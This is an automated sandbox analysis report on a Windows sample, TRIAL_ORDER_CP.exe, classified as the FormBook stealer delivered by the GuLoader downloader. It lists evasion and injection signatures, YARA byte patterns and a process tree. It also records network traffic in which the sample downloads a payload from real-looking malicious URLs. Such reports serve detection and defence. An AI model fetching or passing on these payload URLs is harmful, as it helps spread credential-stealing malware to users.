Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TRIAL_ORDER_CP.exe

Overview

General Information

Sample name:TRIAL_ORDER_CP.exe
Analysis ID:1500398
MD5:5a14d64b70fc7106cb6c14be1aaa7482
SHA1:0612c6f0f1aa18f6e96de3d7ae39193981d9bb95
SHA256:bdd5b953bef085550bb5891e8d3c7248b5b16fcbba1bb26e2be18c4801d1a98e
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Copy From or To System Directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • TRIAL_ORDER_CP.exe (PID: 3000 cmdline: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe" MD5: 5A14D64B70FC7106CB6C14BE1AAA7482)
    • TRIAL_ORDER_CP.exe (PID: 7964 cmdline: "C:\Users\user\Desktop\TRIAL_ORDER_CP.exe" MD5: 5A14D64B70FC7106CB6C14BE1AAA7482)
      • RAVCpl64.exe (PID: 5968 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • Robocopy.exe (PID: 4364 cmdline: "C:\Windows\SysWOW64\Robocopy.exe" MD5: 6B2AE9D48535CE68D53D56E65248BB4C)
          • explorer.exe (PID: 5060 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 2 entries

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Suspicious Copy From or To System Directory
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine: "C:\Windows\SysWOW64\Robocopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\Robocopy.exe, NewProcessName: C:\Windows\SysWOW64\Robocopy.exe, OriginalFileName: C:\Windows\SysWOW64\Robocopy.exe, ParentCommandLine: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s, ParentImage: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe, ParentProcessId: 5968, ParentProcessName: RAVCpl64.exe, ProcessCommandLine: "C:\Windows\SysWOW64\Robocopy.exe", ProcessId: 4364, ProcessName: Robocopy.exe

        Suricata Signatures

        Timestamp:2024-08-28T12:25:21.088617+0200
        SID:2803270
        Severity:2
        Source Port:49865
        Destination Port:80
        Protocol:TCP
        Classtype:Potentially Bad Traffic

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: TRIAL_ORDER_CP.exeReversingLabs: Detection: 26%
        Source: TRIAL_ORDER_CP.exeVirustotal: Detection: 42%Perma Link
        Yara detected FormBook
        Source: Yara matchFile source: 00000006.00000002.272502680086.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.272502162049.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.270972099407.0000000033830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Machine Learning detection for sample
        Source: TRIAL_ORDER_CP.exeJoe Sandbox ML: detected
        Source: TRIAL_ORDER_CP.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: TRIAL_ORDER_CP.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
        Source: Binary string: robocopy.pdb source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: TRIAL_ORDER_CP.exe, TRIAL_ORDER_CP.exe, 00000003.00000003.270875655699.000000003392C000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000003.270872760726.0000000033778000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, Robocopy.exe, 00000006.00000002.272502876792.0000000004530000.00000040.00001000.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270959719356.000000000437D000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000003.270956945724.00000000041C5000.00000004.00000020.00020000.00000000.sdmp, Robocopy.exe, 00000006.00000002.272502876792.000000000465D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: robocopy.pdbGCTL source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960780769.0000000003824000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmp
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_00405C60 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C60
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 0_2_004068B1 FindFirstFileW,FindClose,0_2_004068B1
        Source: C:\Users\user\Desktop\TRIAL_ORDER_CP.exeCode function: 4x nop then mov ebx, 00000004h3_2_338004DE
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h5_2_0473ED1C
        Source: C:\Windows\SysWOW64\Robocopy.exeCode function: 4x nop then mov ebx, 00000004h6_2_048804DE
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49865 -> 38.242.218.41:80
        Source: global trafficHTTP traffic detected: GET /.ex/ELFyaa85.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: sz.zxg6.za.comCache-Control: no-cache
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /.ex/ELFyaa85.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: sz.zxg6.za.comCache-Control: no-cache
        Source: global trafficDNS traffic detected: DNS query: sz.zxg6.za.com
        Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
        Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRoot
        Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
        Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: TRIAL_ORDER_CP.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: explorer.exe, 00000007.00000003.272792565744.000000000D339000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275196926066.000000000D33E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D32F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crl
        Source: explorer.exe, 00000007.00000002.275186219956.0000000002960000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000002.275193654796.0000000009C20000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.272433570950.000000000AB90000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003809000.00000004.00000020.00020000.00000000.sdmp, TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sz.zxg6.za.com/.ex/ELFyaa85.bin
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270971425091.0000000032F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sz.zxg6.za.com/.ex/ELFyaa85.binAwarTrowww.kapiextra.com/ELFyaa85.bin
        Source: TRIAL_ORDER_CP.exe, 00000003.00000002.270960579631.0000000003809000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sz.zxg6.za.com/.ex/ELFyaa85.binJ
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.foreca.com
        Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000649000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.0000000000626000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: TRIAL_ORDER_CP.exe, 00000003.00000001.270673846471.00000000005F2000.00000020.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: explorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
        Source: explorer.exe, 00000007.00000002.275200497819.000000000D9D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272438693849.000000000D9D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppQ
        Source: explorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm
        Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSB
        Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSXboxGamew
        Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOStore_8wec
        Source: explorer.exe, 00000007.00000000.272439827877.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSyb3d8bbw
        Source: explorer.exe, 00000007.00000002.275201893424.0000000010ED0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.wy
        Source: explorer.exe, 00000007.00000003.272794146189.00000000097E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.000000000978A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432151244.000000000978A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000007.00000002.275191719232.000000000963E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793812932.000000000963B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009615000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272792772276.0000000009615000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000007.00000002.275196926066.000000000D2EF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272435776425.000000000D2EF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?=
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=409F83E3643B46AFA5176A6D0817A617&timeOut=5000&oc
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: explorer.exe, 00000007.00000000.272432151244.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272794146189.0000000009886000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.0000000009886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?$
        Source: explorer.exe, 00000007.00000003.272794146189.00000000097E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.275192124722.000000000978A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432151244.000000000978A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/background/v2.0/jpg/
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svg
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.png
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_AQ_Y.svg
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Alert/Alert_TH_Y.svg
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.png
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition/AAehwh2.svg
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/taskbar_v10/
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W33_Clea
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.coC
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-dark
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gDrC-dark
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHN8-dark
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMkZ-dark
        Source: explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRnR-dark
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyym-dark
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://chachingqueen.com/save-on-electric-bills/#2_kill_energy_vampires_unplug_appliances_when_not_
        Source: explorer.exe, 00000007.00000002.275191883367.00000000096D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272432020517.00000000096D8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: explorer.exe, 00000007.00000002.275199213617.000000000D7CF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437830122.000000000D7CF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comS
        Source: explorer.exe, 00000007.00000002.275191203436.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.272793288757.0000000009561000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.0000000009561000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityiEA
        Source: explorer.exe, 00000007.00000002.275191203436.00000000094D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272431518007.00000000094D0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12I8qo.img
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15YhMq.img
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15spNo.img
        Source: explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1gKAgr.img
        Source: explorer.exe, 00000007.00000002.275198537514.000000000D642000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.272437222092.000000000D642000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1iq0gq.img
